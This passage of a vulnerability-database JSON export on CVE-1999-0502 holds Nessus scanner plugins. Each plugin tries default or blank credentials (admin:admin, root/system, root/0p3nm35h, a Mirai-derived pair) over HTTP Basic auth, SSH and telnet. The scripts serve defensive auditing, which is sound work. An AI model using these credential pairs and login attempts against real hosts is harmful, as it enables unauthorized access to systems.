"5e0bd03bec244039678f2b955a2595aa"}], "hash": "d8f3f9c73ec5bfc1d07ce5278f1b1c768c6745689decf8db00c0a5bee64774ce", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# This script was written by Forrest Rae <forrest.rae@digitaldefense.net>\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11208);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/06/13 18:56:26\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Netscape Enterprise Default Administrative Password\");\n script_summary(english:\"Netscape Enterprise Default Administrative Password\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a default set of administrative\ncredentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"This host is running Netscape Enterprise Server. The administrative\ninterface for this web server is using the default username and\npassword of 'admin'. An attacker can use this to reconfigure the web\nserver, cause a denial of service condition, or gain access to this\nhost.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Please assign the web administration console a difficult-to-guess\npassword.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:TF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:netscape:enterprise_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Digital Defense Inc.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/www\", 8888);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\ndebug = 0;\n\nports = add_port_in_list(list:get_kb_list(\"Services/www\"), port:8888);\n\nforeach port (ports)\n{\n\tif ( !get_port_state(port) ) continue;\n\tbanner = get_http_banner(port:port);\n\tif ( ! banner || (\"Netscape\" >!< banner && \"iPlanet\" >!< banner ) ) continue;\n\tsoc = http_open_socket(port);\n\n\tif (soc)\n\t{\n\n\t\t# HTTP auth = \"admin:admin\"\n\n\n\t\treq = http_get(item:\"/https-admserv/bin/index\", port:port);\n \t\treq = req - string(\"\\r\\n\\r\\n\");\n \t\treq = string(req, \"\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\n\\r\\n\");\n\n\n\t\tsend(socket:soc, data:req);\n\t\tbuf = http_recv(socket:soc);\n\t\thttp_close_socket(soc);\n\t\tif (isnull(buf)) continue;\n\n\t\tif(debug == 1) display(\"\\n\\n\", buf, \"\\n\\n\");\n\n\n\t\tif ((\"Web Server Administration Server\" >< buf) && (\"index?tabs\" >< buf))\n\t\t{\n\t\t\tsecurity_hole(port:port);\n\t\t}\n\t}\n}\n\n", "naslFamily": "CGI abuses", "pluginID": "11208", "cpe": ["cpe:/a:netscape:enterprise_server"]}

{"cve": [{"lastseen": "2016-09-03T02:14:57", "references": [], "description": "A Unix account has a default, null, blank, or missing password.", "edition": 1, "reporter": "NVD", "published": "1998-03-01T00:00:00", "title": "CVE-1999-0502", "type": "cve", "enchantments": {"score": {"modified": "2016-09-03T02:14:57", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-1999-0502"], "scanner": [], "cpe": ["cpe:/o:redhat:linux:6.0", "cpe:/o:sun:solaris:8.0", "cpe:/o:sun:solaris:2.5.1", "cpe:/o:sun:solaris:2.6", "cpe:/o:hp:hp-ux:10.20", "cpe:/o:sun:solaris:7.0", "cpe:/o:hp:hp-ux:11"], "modified": "2008-09-09T08:34:39", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0502", "id": "CVE-1999-0502", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:42:19", "references": [], "pluginID": "94368", "description": "The account 'admin' on the remote host has the default password 'admin1234'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "edition": 6, "reporter": "Tenable", "published": "2016-10-28T00:00:00", "title": "Default Password 'admin1234' for 'admin' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-11-20T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_ADMIN1234.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=94368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"admin1234\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94368);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:55 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'admin1234' for 'admin' Account\");\n script_summary(english:\"Attempts to log into the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'admin1234'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Change the password for this account or disable it.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n\n script_dependencie(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:42:11", "references": [], "pluginID": "94360", "description": "The account 'admin' on the remote host has the default password '1111'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "edition": 6, "reporter": "Tenable", "published": "2016-10-28T00:00:00", "title": "Default Password '1111' for 'admin' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-11-20T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_1111.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=94360", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"1111\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94360);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:55 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '1111' for 'admin' Account\");\n script_summary(english:\"Attempts to log into the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'1111'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Change the password for this account or disable it.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n\n script_dependencie(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:43:08", "references": [], "pluginID": "94356", "description": "The account '666666' on the remote host has the default password '666666'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "edition": 6, "reporter": "Tenable", "published": "2016-10-28T00:00:00", "title": "Default Password '666666' for '666666' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-11-20T00:00:00", "cpe": [], "id": "ACCOUNT_666666_666666.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=94356", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"666666\";\npassword = \"666666\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94356);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:55 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '666666' for '666666' Account\");\n script_summary(english:\"Attempts to log into the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account '666666' on the remote host has the default password\n'666666'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n\n script_dependencie(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:05:47", "references": [], "pluginID": "94397", "description": "The account 'root' on the remote host has the default password 'system'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "edition": 6, "reporter": "Tenable", "published": "2016-10-28T00:00:00", "title": "Default Password 'system' for 'root' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-11-20T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_SYSTEM.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=94397", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"system\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94397);\n script_version (\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:56 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'system' for 'root' Account\");\n script_summary(english:\"Attempts to log into the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'system'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Change the password for this account or disable it.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n\n script_dependencie(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:55:55", "references": ["https://en.wikipedia.org/wiki/Mirai_(malware)", "http://www.nessus.org/u?539c6e47"], "pluginID": "94375", "description": "The account 'mother' on the remote host has the default password 'f****r'. A remote attacker can exploit this issue to gain administrative access to the affected system.\n\nNote that this username / password combination was found in the leaked source from the Mirai botnet. The password has been masked in this description.", "edition": 7, "reporter": "Tenable", "published": "2016-10-28T00:00:00", "title": "Default Password 'f****r' for 'mother' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-11-20T00:00:00", "cpe": [], "id": "ACCOUNT_MOTHER_FUCKER.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=94375", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"mother\";\npassword = \"fucker\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94375);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:56 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'f****r' for 'mother' Account\");\n script_summary(english:\"Attempts to log into the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'mother' on the remote host has the default password\n'f****r'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\n\nNote that this username / password combination was found in the leaked\nsource from the Mirai botnet. The password has been masked in this\ndescription.\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Change the password for this account or disable it.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"see_also\", value:\"https://en.wikipedia.org/wiki/Mirai_(malware)\");\n # https://github.com/jgamblin/Mirai-Source-Code/blob/6a5941be681b839eeff8ece1de8b245bcd5ffb02/mirai/bot/scanner.c#L123\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?539c6e47\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n\n script_dependencie(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:11", "references": [], "pluginID": "11249", "description": "The account 'jack' has no password set. An attacker may use this to gain further privileges on this system.", "edition": 14, "reporter": "Tenable", "published": "2003-02-20T00:00:00", "title": "Unpassworded 'jack' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2018-07-25T00:00:00", "cpe": [], "id": "ACCOUNT_JACK.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11249", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"jack\";\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11249);\n script_version (\"1.34\");\n script_cvs_date(\"Date: 2018/07/25 16:19:22\");\n\n script_cve_id(\"CVE-1999-0502\");\n \n script_name(english:\"Unpassworded 'jack' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'jack' has no password set. An attacker may use this\nto gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n \n script_copyright(english:\"This script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude('global_settings.inc');\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:48:58", "references": ["http://www.nessus.org/u?6d0967a9"], "pluginID": "48274", "description": "The account 'root' on the remote host has the password '0p3nm35h'. An attacker may leverage this issue to gain total control of the affected system.\n\nNote that some network devices are known to use these credentials by default.", "edition": 5, "reporter": "Tenable", "published": "2010-08-09T00:00:00", "title": "Default Password (0p3nm35h) for 'root' Account", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Unix Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2017-11-20T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_0P3NM35H.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=48274", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"0p3nm35h\";\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(48274);\n script_version (\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:56 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (0p3nm35h) for 'root' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password '0p3nm35h'. \nAn attacker may leverage this issue to gain total control of the\naffected system.\n\nNote that some network devices are known to use these credentials by\ndefault.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code 